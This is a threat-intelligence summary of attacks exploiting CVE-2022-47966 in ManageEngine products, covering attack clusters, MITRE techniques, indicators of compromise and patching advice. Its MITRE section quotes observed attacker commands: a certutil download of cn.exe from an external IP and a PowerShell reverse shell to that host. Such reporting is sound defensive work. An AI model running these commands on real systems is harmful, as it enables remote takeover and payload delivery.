Threat Research

Technical Advisory: Various Threat Actors Targeting ManageEngine Exploit CVE-2022-47966

Securonix

Bitdefender Labs observed a global wave of opportunistic attacks exploiting CVE-2022-47966 in ManageEngine products, with 2,000–4,000 internet-facing servers potentially vulnerable. The advisory documents four attack clusters (Initial Access Brokers, Buhti Ransomware, Cobalt Strike with RAT-el, and cyber espionage) and offers patching and multi-layer defense recommendations.
#CVE-2022-47966 #ManageEngine #BuhtiRansomware #CobaltStrike #RAT-el

Keypoints

  • Vulnerability CVE-2022-47966 is a critical remote code execution flaw affecting 24 ManageEngine products.
  • Between 2,000 and 4,000 internet-accessible servers were identified as running vulnerable versions.
  • The report outlines four attack clusters: Initial Access Brokers, Buhti Ransomware, Cobalt Strike + RAT-el, and Cyber Espionage.
  • Attackers leverage automated scanners to locate vulnerable systems and deploy web shells for remote access.
  • The observed toolchain includes certutil.exe, bitsadmin.exe, powershell.exe, and curl.exe to download and run payloads.
  • Buhti Ransomware encrypts files and instructs victims to pay for a decryptor; AnyDesk is used for remote access.
  • Recommendations emphasize prompt patching, multi-layer endpoint protection, IP/domain/URL reputation, and detection/response capabilities (e.g., GravityZone XDR).

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – CVE-2022-47966 used to gain unauthenticated remote code execution in ManageEngine products. Quote: “This Remote Code Execution vulnerability (CVSSv3 critical score 9.8) allows full takeover of the compromised system by unauthenticated threat actors.”
  • [T1046] Network Service Scanning – Automated scanners are used to identify vulnerable systems and automate compromises (spray-and-pray tactic). Quote: “Using automated scanners, vulnerable systems are discovered and automatically compromised (spray-and-pray tactic).”
  • [T1505.003] Web Shell – Malicious payload (typically a webshell to enable remote administration access) is deployed on compromised server. Quote: “Malicious payload (typically a webshell to enable remote administration access) is deployed on compromised server.”
  • [T1105] Ingress Tool Transfer – Tools and payloads are downloaded or transferred to targets using certutil, bitsadmin, curl, and PowerShell. Quote: “certutil.exe -urlcache -f http://80.85.156[.]184:8085/cn.exe C:cn.exe” and “powershell C:cn.exe -e cmd.exe 80.85.156[.]184 443”
  • [T1059.001] PowerShell – PowerShell is used to execute payloads and commands. Quote: “powershell C:cn.exe -e cmd.exe 80.85.156[.]184 443”
  • [T1021.001] Remote Services – RDP is enabled on a port to provide remote access (e.g., “Enable RDP on port 8094”).
  • [T1486] Data Encrypted for Impact – Buhti Ransomware encrypts files and demands payment for decryption. Quote: “Your files are encrypted. We use strong encryption algorithms, so you cannot decrypt your data.”
  • [T1071] Application Layer Protocol – C2 traffic observed to domain/ip (e.g., “Cobalt Strike beacon with C2 0xx1.kaspenskyupdates[.]com”).

Indicators of Compromise

  • [URLs] context – http://80.85.156[.]184:8085/cn.exe, https://tmpfiles[.]org/dl/788858/any.txt
  • [IP Addresses] context – 45.154.14[.]194, 149.28.57[.]130
  • [Domains] context – 0xx1.kaspenskyupdates[.]com, icy51j1b6sbewpauivxwfrmcu30vok.oastify[.]com
  • [MD5 Hash] context – 9a1d9fe9b1223273c314632d04008384, e0fb946c00b140693e3cf5de258c22a1
  • [File] context – AnyDesk.exe, cn.exe

Read more: https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint